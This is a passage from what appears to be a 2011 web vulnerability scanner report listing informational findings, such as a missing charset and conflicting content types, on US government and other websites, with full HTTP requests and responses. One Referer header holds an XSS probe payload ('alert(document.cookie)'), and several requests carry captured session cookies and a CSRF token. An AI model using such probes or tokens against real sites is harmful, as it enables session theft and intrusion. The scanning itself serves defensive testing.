Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733
Content-Length: 25

data=headers&tryAttempt=0

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:38 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 190


<ul class="orderTipList" >

<li class="orderTipListItem"><a href="javascript:viewFAQBody('43')">Why do you need to know if I am ordering my own certificate?</a></li>

</ul>

26.78. https://www.vitalchek.com/AjaxOrderStepServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vitalchek.com
Path:   /AjaxOrderStepServer.aspx

Request

POST /AjaxOrderStepServer.aspx HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
Origin: https://www.vitalchek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.1.10.1304125733
Content-Length: 30

data=shoppingCart&tryAttempt=0

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:23 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5814

{"OrderReviewed":false,"TermsAndConditionsAgreed":false,"CanChargeOnline":false,"currentOrderDetailIndex":0,"orderDetails":[{"ProductId":0,"ApplicantRelationship":null,"OrderDetailId":0,"CertificateFe
...[SNIP]...

26.79. https://www.vitalchek.com/order_step_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vitalchek.com
Path:   /order_step_js.aspx

Request

GET /order_step_js.aspx?timestamp=1304125790304&_=1304125790305 HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:35 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html
Content-Length: 2862

showNameLabel();

jQuery(document).ready(function ($) {
LoadSurveyScript();
});

function showNameLabel()
{
if ($('YesRadio').checked == true) {
if (shoppingCart.currentOrderD
...[SNIP]...

27. Multiple content types specified  previous  next
There are 2 instances of this issue:


27.1. http://data.ok.gov/packages/shared-table-editor.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /packages/shared-table-editor.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /packages/shared-table-editor.js?1304035492 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.1.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:04:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sat, 07 May 2011 11:22:49 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript
Content-Length: 241599

var blistUtilNS=blist.namespace.fetch("blist.util");blistUtilNS.toHumaneNumber=function(g,b){var f=["K","M","B","T"];var e=1000;var d=Math.pow(e,f.length);var h=Math.abs(g);var a;g=parseFloat(g);for(v
...[SNIP]...
<base href="'+G.documentBaseURI.getURI()+'" />'}G.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(o.relaxedDomain){G.iframeHTML+='<script type="text/javascript">
...[SNIP]...

27.2. http://phonebook.iowa.gov/scripts/tiny_mce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phonebook.iowa.gov
Path:   /scripts/tiny_mce/tiny_mce.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /scripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: phonebook.iowa.gov
Proxy-Connection: keep-alive
Referer: http://phonebook.iowa.gov/info.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:15:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 161783
Content-Type: application/x-javascript
Last-Modified: Mon, 09 Aug 2010 19:33:41 GMT
Accept-Ranges: bytes
ETag: "553f98c5f937cb1:e8d"
X-Powered-By: ASP.NET

var tinymce={majorVersion:'3',minorVersion:'2.1.1',releaseDate:'2008-11-27',_init:function(){var t=this,d=document,w=window,na=navigator,ua=na.userAgent,i,nl,n,base,p,v;t.isOpera=w.opera&&opera.buildN
...[SNIP]...
<base href="'+t.documentBaseURI.getURI()+'" />';t.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(tinymce.relaxedDomain)t.iframeHTML+='<script type="text/javascript">
...[SNIP]...

28. HTML does not specify charset  previous  next
There are 80 instances of this issue:


28.1. http://admin.state.nh.us/hr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.state.nh.us
Path:   /hr/

Request

GET /hr/ HTTP/1.1
Host: admin.state.nh.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Location: http://admin.state.nh.us/hr/index.html
Last-Modified: Mon, 21 Mar 2011 15:18:48 GMT
Accept-Ranges: bytes
ETag: "03cb046dbe7cb1:c5b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:33:35 GMT
Content-Length: 11536

<HTML>
<HEAD>
   <TITLE>State of New Hampshire Human Resources</TITLE>
   <META name=description content="">
   <META name=keywords content="" >
   <link rel= "stylesheet" type= "text/css" href="hrwebsit
...[SNIP]...

28.2. http://admin.state.nh.us/hr/retirement_benefits.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.state.nh.us
Path:   /hr/retirement_benefits.html

Request

GET /hr/retirement_benefits.html HTTP/1.1
Host: admin.state.nh.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 01 Apr 2011 14:55:54 GMT
Accept-Ranges: bytes
ETag: "0b943e67cf0cb1:c5b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:33:37 GMT
Content-Length: 13784

<html>
<head>
   <title>Retired Employee Benefits, State of New Hampshire Human Resources</title>
   <meta name=description content="">
   <meta name=keywords content="" >
   <link rel= "stylesheet" type
...[SNIP]...

28.3. http://al.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://al.gov
Path:   /

Request

GET / HTTP/1.1
Host: al.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:21 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Content-Type: text/html
Content-Length: 85

<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.alabama.gov/portal/index.jsp">

28.4. http://business.ohio.gov/inc/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.ohio.gov
Path:   /inc/print.css

Request

GET /inc/print.css HTTP/1.1
Host: business.ohio.gov
Proxy-Connection: keep-alive
Referer: http://business.ohio.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:37:20 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

28.5. http://cityofmuscleshoals.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cityofmuscleshoals.com
Path:   /Default.asp

Request

GET /Default.asp HTTP/1.1
Host: cityofmuscleshoals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
Content-Length: 12767
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQBRQBTR=FMMIMMOBDHDHEIKEOFLEMEMB; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base href="http://cityofmuscleshoals.com/Sites/Muscle_Shoals/" />
<title>Muscle Shoals, Alabama | Main-Homepage</title
...[SNIP]...

28.6. http://data.gosquared.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.gosquared.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 30 Apr 2011 11:44:26 GMT
Server: nginx/0.8.54
Content-Length: 571
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

28.7. http://emergency.louisiana.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://emergency.louisiana.gov
Path:   /

Request

GET / HTTP/1.1
Host: emergency.louisiana.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:52 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 20:25:40 GMT
ETag: "2fbc2-55f1-4a031ae013900"
Accept-Ranges: bytes
Content-Length: 22001
Content-Type: text/html

<link href="scripts/css/master.css" rel="stylesheet" type="text/css">
<title>emergency.louisiana.gov</title>
<table class="table-lagov" style="border-bottom: 1px solid rgb(175, 175, 175);">
<tbo
...[SNIP]...

28.8. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Sat, 30 Apr 2011 15:08:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2415

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...

28.9. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ilsapp.lib.de.us
Path:   /uhtbin/cgisirsi/x/x/0/5

Request

GET /uhtbin/cgisirsi/x/x/0/5 HTTP/1.1
Host: ilsapp.lib.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:03 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8f DAV/2
Expires: Thu, 29 Feb 1996, 10:27:00 GMT
Pragma: no-cache
Cache-Control: no-cache,must-revalidate,no-store
Set-Cookie: session_number=37040205; path=/
Connection: close
Content-Type: text/html
Content-Length: 8336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Copyright (c) 2000 - 2009, SirsiDynix - Defines the head body of each page. -->

<h
...[SNIP]...

28.10. http://in.gov/core/index_pages/quicklinks.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/index_pages/quicklinks.html

Request

GET /core/index_pages/quicklinks.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:35:49 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 2974
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:36:49 GMT; path=/

<div id="twocolumn"> <span class="breadcrumbs"><a href="/core/index.html" title="Home">Home</a> &gt; QuickLinks</span><span class="subscribe"><a href="javascript:window.open('/core/subscriptions_ql.ht
...[SNIP]...

28.11. http://jqueryui.com/themeroller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 30 Apr 2011 12:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117009

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...

28.12. http://ky.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ky.gov
Path:   /

Request

GET / HTTP/1.1
Host: ky.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 00:32:32 GMT
Content-length: 352
Content-type: text/html
Last-modified: Tue, 01 Nov 2005 21:19:10 GMT
Etag: "160-4367dbce"
Accept-ranges: bytes

<!doctype html public "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Refresh" content="0; URL=http://kentucky.gov/">
<meta name="Robots" content="NoIndex, NoFollow, NoArchive" />
</noscript>
...[SNIP]...

28.13. http://la.gov/phpincludes/weathergraphic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://la.gov
Path:   /phpincludes/weathergraphic.php

Request

GET /phpincludes/weathergraphic.php HTTP/1.1
Host: la.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Length: 296
Content-Type: text/html

<link rel="stylesheet" type="text/css" href="/lagov.css">

<div style="width:400px; height:334px; position:absolute; z-index:5; margin-left:-80px; margin-top:-63px; padding:0;"><img src="http://sirocc
...[SNIP]...

28.14. http://legis.delaware.gov/Lookup/ContactInfo_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/ContactInfo_Home

Request

GET /Lookup/ContactInfo_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:04 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:04 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.15. http://legis.delaware.gov/Lookup/Divisions_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/Divisions_Home

Request

GET /Lookup/Divisions_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:05 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:05 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.16. http://legis.delaware.gov/Lookup/GeneralInfo_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/GeneralInfo_Home

Request

GET /Lookup/GeneralInfo_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:06 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:06 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.17. http://legis.delaware.gov/Lookup/House_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/House_Home

Request

GET /Lookup/House_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:06 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:06 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.18. http://legis.delaware.gov/Lookup/Meetings_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/Meetings_Home

Request

GET /Lookup/Meetings_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:07 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:07 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.19. http://legis.delaware.gov/Lookup/OnlinePub_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/OnlinePub_Home

Request

GET /Lookup/OnlinePub_Home HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:07 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:07 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.20. http://legis.delaware.gov/Lookup/SenateHome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/SenateHome

Request

GET /Lookup/SenateHome HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:08 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:08 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.21. http://legis.delaware.gov/Lookup/copyright  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Lookup/copyright

Request

GET /Lookup/copyright HTTP/1.1
Host: legis.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 12:22:04 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 30 Apr 2011 12:22:04 GMT
Content-Type: text/html
Content-Length: 159

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>

28.22. http://legis.delaware.gov/Lookup/disclaimer  previous  next

Summary

Severity:   Information
